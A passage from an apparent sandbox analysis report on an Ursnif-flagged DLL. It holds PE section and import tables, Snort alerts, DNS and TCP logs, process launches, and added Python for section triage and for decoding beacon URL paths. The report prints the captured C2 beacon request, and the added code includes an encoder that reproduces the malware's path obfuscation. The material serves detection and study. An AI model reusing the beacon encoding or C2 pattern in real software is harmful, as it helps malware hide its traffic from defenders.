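def triage(sections: list, entropy_threshold: float = 7.0, growth_factor: int = 8) -> list:
    """Return (section, finding) pairs; thresholds are this example's own choice."""
    findings = []
    for s in sections:
        executable = bool(s["chars"] & IMAGE_SCN_MEM_EXECUTE)
        if executable and s["entropy"] >= entropy_threshold:
            findings.append((s["name"], "high-entropy executable section"))
        if s["raw_size"] and s["vsize"] >= growth_factor * s["raw_size"]:
            findings.append((s["name"], "virtual size far exceeds raw size"))
        if executable and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append((s["name"], "writable and executable"))
    return findings


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image (not the analysed file): a uniform-entropy .text
    and a .data section that is 0x998c8 bytes in memory but only 0x200 bytes on disk."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)            # PE32 magic, rest zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x4C2B8293, 0, 0, len(opt), 0x2102)

    def hdr(name, vsize, va, raw_size, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)

    text_hdr = hdr(b".text", 0x1F0, 0x1000, 0x200, 0x200,
                   IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    data_hdr = hdr(b".data", 0x998C8, 0x2000, 0x200, 0x400,
                   IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    headers = dos + b"PE\0\0" + coff + opt + text_hdr + data_hdr
    headers += b"\0" * (0x200 - len(headers))
    text_raw = bytes(range(256)) * 2       # every byte value equally likely: entropy 8.0
    data_raw = b"\0" * 0x200               # all zeros: entropy 0.0
    return headers + text_raw + data_raw


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s['name']:<8} va=0x{s['va']:x} vsize=0x{s['vsize']:x} "
              f"raw=0x{s['raw_size']:x} entropy={s['entropy']:.2f}")
    for name, finding in triage(secs):
        print(f"  {name}: {finding}")
```

                                    Against the report's own numbers the growth check is the one that fires: .data grows by a factor of roughly 100 (0x998c8 / 0x1800), while .text at 6.64 bits sits below the 7.0 threshold, so a high-entropy rule alone would not have flagged this sample.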

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_DIALOG | 0xfc250 | 0xce | data | English | United States
                                    RT_DIALOG | 0xfc320 | 0x112 | data | English | United States
                                    RT_DIALOG | 0xfc438 | 0x13a | data | English | United States
                                    RT_DIALOG | 0xfc578 | 0xf2 | data | English | United States
                                    RT_DIALOG | 0xfc670 | 0x11a | data | English | United States
                                    RT_DIALOG | 0xfc790 | 0xf0 | data | English | United States
                                    RT_DIALOG | 0xfc880 | 0xf8 | data | English | United States
                                    RT_DIALOG | 0xfc978 | 0xca | data | English | United States
                                    RT_DIALOG | 0xfca48 | 0xea | data | English | United States
                                    RT_DIALOG | 0xfcb38 | 0xc8 | data | English | United States
                                    RT_MANIFEST | 0xfcc00 | 0x17d | XML 1.0 document text | English | United States

                                    Imports

                                    DLL | Import
                                    KERNEL32.dll | CreateProcessA, GetStartupInfoA, CopyFileA, DeleteFileA, CloseHandle, GetTickCount, Sleep, GetCurrentThreadId, GetProcAddress, LoadLibraryA, VirtualProtectEx, GetEnvironmentVariableA, GetTempPathA, GetWindowsDirectoryA, SetConsoleCP, SetConsoleOutputCP, GetCurrentDirectoryA, CompareStringW, CompareStringA, CreateFileA, GetLocaleInfoW, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, InitializeCriticalSectionAndSpinCount, SetFilePointer, ReadFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, GetSystemTimeAsFileTime, HeapAlloc, RtlUnwind, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCommandLineA, GetLastError, HeapFree, GetCPInfo, LCMapStringA, LCMapStringW, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetTimeZoneInformation, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, HeapDestroy, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, GetModuleHandleA, SetHandleCount, GetFileType, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, HeapSize, SetEnvironmentVariableA
                                    USER32.dll | GetClientRect, GetDesktopWindow, CreateDialogIndirectParamA, GetForegroundWindow, GetWindowRect, DialogBoxIndirectParamA, CreatePopupMenu, GetSysColorBrush, DispatchMessageA
                                    ole32.dll | CoTaskMemFree, CoTaskMemAlloc, CoInitialize, CoUninitialize

                                    Exports

                                    Name | Ordinal | Address
                                    Beautyresult | 1 | 0x102c990
                                    Division | 2 | 0x102da30
                                    Fastcolor | 3 | 0x102d940
                                    Yetclose | 4 | 0x102dcb0

                                    Possible Origin

                                    Language of compilation system | Country where language is spoken | Map
                                    English | United States |

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    07/09/21-15:24:33.634449 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49729 | 80 | 192.168.2.3 | 40.97.128.194
                                    07/09/21-15:24:33.634449 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49729 | 80 | 192.168.2.3 | 40.97.128.194
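                                    Both alerts fire on the same HTTP request (port 49729 to 40.97.128.194:80) and their names point at the tokens they key on: "_2B" for the M1 rule and "_2F" for the M2 rule. The following is an added example, not part of the sandbox report and not the Emerging Threats rules themselves. It assumes what published Ursnif/Gozi traffic analyses describe and this page does not state: the request path carries a base64 blob in which '+' and '/' are escaped as _2B and _2F, '/' separators are inserted into the blob, and '=' padding is dropped. The directory name "images", the file name "x.gif", the chunk size and the request lines are all constructed for the example; the decoder restores padding whether or not the original stripped it.

```python
import base64
import binascii
import re

# Tokens named in the two alert messages (M1 = _2B, M2 = _2F) and the base64
# characters they are assumed to stand for (URL-escape style, '_' in place of '%').
ESCAPES = {"_2B": "+", "_2F": "/"}
TOKEN_RE = re.compile(r"_2[BF]")
REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")


def find_beacon_tokens(path: str) -> list:
    """Escape tokens present in a request path, sorted; [] means neither rule idea matches."""
    return sorted(set(TOKEN_RE.findall(path)))


def encode_beacon_path(data: bytes, directory: str = "images",
                       filename: str = "x.gif", chunk: int = 5) -> str:
    """Client side (constructed for this example): base64 without padding, split into
    chunks joined by '/', with '+' and '/' escaped to _2B/_2F so tokens are never split."""
    b64 = base64.b64encode(data).decode("ascii").rstrip("=")
    pieces = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    escaped = [p.replace("+", "_2B").replace("/", "_2F") for p in pieces]
    return "/" + "/".join([directory] + escaped + [filename])


def decode_beacon_path(path: str):
    """Detector side: reverse the transform; None if the path does not decode."""
    segments = [s for s in path.split("/") if s]
    if len(segments) < 3:                        # need directory, blob, filename
        return None
    blob = "".join(segments[1:-1])               # drop inserted separators first...
    for token, char in ESCAPES.items():          # ...then restore the escaped chars
        blob = blob.replace(token, char)
    blob += "=" * (-len(blob) % 4)               # restore stripped padding
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_request_line(line: str) -> dict:
    """Run both checks on one HTTP request line as a network sensor would see it."""
    m = REQUEST_LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return {"path": None, "tokens": [], "decoded": None}
    path = m.group("path")
    return {"path": path, "tokens": find_beacon_tokens(path),
            "decoded": decode_beacon_path(path)}


if __name__ == "__main__":
    # Constructed payload, not captured C2 data; the leading bytes force '+' and '/'
    # into the base64 output so both tokens appear in the path.
    sample = b"\xfb\xff" + b"constructed beacon body"
    line = "GET " + encode_beacon_path(sample) + " HTTP/1.1"
    print(line)
    print(inspect_request_line(line))
```

                                    The token check is what a signature can do on the wire; the decode step is the triage follow-up, and on real traffic it yields ciphertext (the blob is encrypted before encoding), so a successful base64 decode, not readable content, is the signal that the path has the expected structure.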

                                    Network Port Distribution

                                    TCP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jul 9, 2021 15:24:33.507741928 CEST | 49729 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.508086920 CEST | 49730 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.633079052 CEST | 80 | 49729 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:33.633184910 CEST | 49729 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.634449005 CEST | 49729 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.636660099 CEST | 80 | 49730 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:33.636779070 CEST | 49730 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.761584997 CEST | 80 | 49729 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:33.761776924 CEST | 49729 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.762681961 CEST | 49729 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.786556005 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.886631966 CEST | 80 | 49729 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:33.915479898 CEST | 443 | 49731 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:33.915713072 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:33.929497004 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.060129881 CEST | 443 | 49731 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.060195923 CEST | 443 | 49731 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.060220003 CEST | 443 | 49731 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.060425997 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.060448885 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.113426924 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.117860079 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.243573904 CEST | 443 | 49731 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.243865013 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.248527050 CEST | 443 | 49731 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.252892971 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.252932072 CEST | 49731 | 443 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:34.303044081 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.303044081 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.315371037 CEST | 443 | 49733 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.315510035 CEST | 443 | 49732 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.315514088 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.315687895 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.316931009 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.317018986 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.330826998 CEST | 443 | 49733 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.330893040 CEST | 443 | 49732 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.330934048 CEST | 443 | 49732 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.330981016 CEST | 443 | 49732 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.331026077 CEST | 443 | 49733 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.331043959 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.331063032 CEST | 443 | 49733 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.331074953 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.331132889 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.331195116 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.341037989 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.350852966 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.351823092 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.354607105 CEST | 443 | 49732 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.354799986 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.365852118 CEST | 443 | 49733 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.366991997 CEST | 443 | 49732 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.367846966 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.367846966 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.368366957 CEST | 49732 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:34.381774902 CEST | 443 | 49731 | 40.97.128.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.382589102 CEST | 443 | 49732 | 52.98.163.18 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.413362980 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.413582087 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.425853968 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.425878048 CEST | 443 | 49734 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.427479029 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.427491903 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.427607059 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.429343939 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.441689014 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.441715956 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.441732883 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.442029953 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.443164110 CEST | 443 | 49734 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.443254948 CEST | 443 | 49734 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.444747925 CEST | 443 | 49734 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.444757938 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.444782019 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.447962046 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.452936888 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.454736948 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.456970930 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.467066050 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.467705965 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.468261003 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.470284939 CEST | 443 | 49734 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.470416069 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:34.480480909 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.480509043 CEST | 443 | 49735 | 52.97.201.194 | 192.168.2.3
                                    Jul 9, 2021 15:24:34.481842041 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:35.952073097 CEST | 49730 | 80 | 192.168.2.3 | 40.97.128.194
                                    Jul 9, 2021 15:24:35.952291965 CEST | 49733 | 443 | 192.168.2.3 | 52.98.163.18
                                    Jul 9, 2021 15:24:35.952323914 CEST | 49734 | 443 | 192.168.2.3 | 52.97.201.194
                                    Jul 9, 2021 15:24:35.953020096 CEST | 49735 | 443 | 192.168.2.3 | 52.97.201.194

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 9, 2021 15:24:33.469208956 CEST | 192.168.2.3 | 8.8.8.8 | 0x6450 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.285837889 CEST | 192.168.2.3 | 8.8.8.8 | 0xcc0b | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.386554956 CEST | 192.168.2.3 | 8.8.8.8 | 0xa524 | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.128.194 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.156.114 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.153.146 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.116.82 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.161.50 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.160.2 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.148.226 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:33.482678890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6450 | No error (0) | outlook.com | - | 40.97.164.146 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | www.outlook.com | outlook.office365.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | outlook.office365.com | outlook.ha.office365.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | outlook.ms-acdc.office.com | ZRH-efz.ms-acdc.office.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.98.163.18 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.97.232.194 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.97.201.210 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.300118923 CEST | 8.8.8.8 | 192.168.2.3 | 0xcc0b | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.97.232.210 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST | 8.8.8.8 | 192.168.2.3 | 0xa524 | No error (0) | outlook.office365.com | outlook.ha.office365.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST | 8.8.8.8 | 192.168.2.3 | 0xa524 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST | 8.8.8.8 | 192.168.2.3 | 0xa524 | No error (0) | outlook.ms-acdc.office.com | ZRH-efz.ms-acdc.office.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST | 8.8.8.8 | 192.168.2.3 | 0xa524 | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.97.201.194 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST | 8.8.8.8 | 192.168.2.3 | 0xa524 | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.97.186.146 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST | 8.8.8.8 | 192.168.2.3 | 0xa524 | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.97.186.114 | A (IP address) | IN (0x0001)
Jul 9, 2021 15:24:34.399265051 CEST | 8.8.8.8 | 192.168.2.3 | 0xa524 | No error (0) | ZRH-efz.ms-acdc.office.com | - | 52.97.201.210 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• outlook.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49729 | 40.97.128.194 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Jul 9, 2021 15:24:33.634449005 CEST | 1321 | OUT |
GET /jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: outlook.com
Connection: Keep-Alive
Jul 9, 2021 15:24:33.761584997 CEST | 1322 | IN |
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw
Server: Microsoft-IIS/10.0
request-id: ae6a76ce-6de3-1bc0-a54d-4b3cc446f95e
X-FEServer: DM5PR2201CA0020
X-RequestId: 75af693c-32c0-4f49-a3d1-8caa8be9ee47
X-Powered-By: ASP.NET
X-FEServer: DM5PR2201CA0020
Date: Fri, 09 Jul 2021 13:24:33 GMT
Connection: close
Content-Length: 0

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 15:23:10
Start date: 09/07/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\c36.dll'
Imagebase: 0x970000
File size: 116736 bytes
MD5 hash: 542795ADF7CC08EFCF675D65310596E8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

General

Start time: 15:23:10
Start date: 09/07/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:23:10
Start date: 09/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
Imagebase: 0x11b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:23:10
Start date: 09/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
Imagebase: 0x11b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
